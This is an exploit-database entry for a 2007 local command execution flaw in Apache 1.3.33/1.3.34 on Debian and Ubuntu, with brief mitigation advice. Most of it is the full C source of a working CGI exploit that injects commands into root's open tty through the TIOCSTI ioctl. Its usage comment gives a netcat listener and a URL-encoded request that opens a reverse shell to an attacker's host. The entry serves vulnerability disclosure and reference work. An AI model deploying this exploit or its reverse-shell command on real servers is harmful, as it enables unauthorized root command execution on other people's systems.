Local Command Execution in Apache

vendor:

Apache HTTP Server

by:

Kristian Hermansen

7.5

CVSS

HIGH

Local Command Execution

CWE

Product Name: Apache HTTP Server

Affected Version From: Apache 1.3.33

Affected Version To: Apache 1.3.34

Patch Exists: NO

Related CWE:

CPE: a:apache:http_server:1.3.33 cpe:/a:apache:http_server:1.3.34

Metasploit:

Other Scripts:

Platforms Tested:

2007

Local Command Execution in Apache

Local attacker can influence Apache to direct commands into an open tty owned by user who started apache process, usually root. This results in arbitrary command execution.

Mitigation:

Disable CGI execution privileges or limit access to trusted users. Ensure that the Apache service is not started manually by root via shell. Remove or secure the .htaccess file to prevent unauthorized execution of CGI scripts.

Source

Exploit-DB raw data:

/*
  :: Kristian Hermansen ::
  Date: 20070229
  Description: Local attacker can influence Apache to direct commands
    into an open tty owned by user who started apache process, usually root.
    This results in arbitrary command execution.
  Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental     and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06)
    Edgy (6.10), Feisty (7.04).
  Notes: Must have CGI execution privileges and
    service started manually by root via shell.
    Also try adding "Options +ExecCGI" to your .htaccess file.
  Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c
  Usage: nc -vvv -l -p 31337
    http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
  u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,
    benkurtz, ... and who could forget ... setient (the gremlin)!!
*/

#include <fcntl.h>
#include <sys/ioctl.h>

int main(int argc, char *argv[]) {
  int pts = open("/dev/tty",O_RDONLY);
  while(*argv[1] != '\0') {
    ioctl(pts,TIOCSTI,argv[1]);
    argv[1]++;
  }
  return 0;
}

// milw0rm.com [2007-02-28]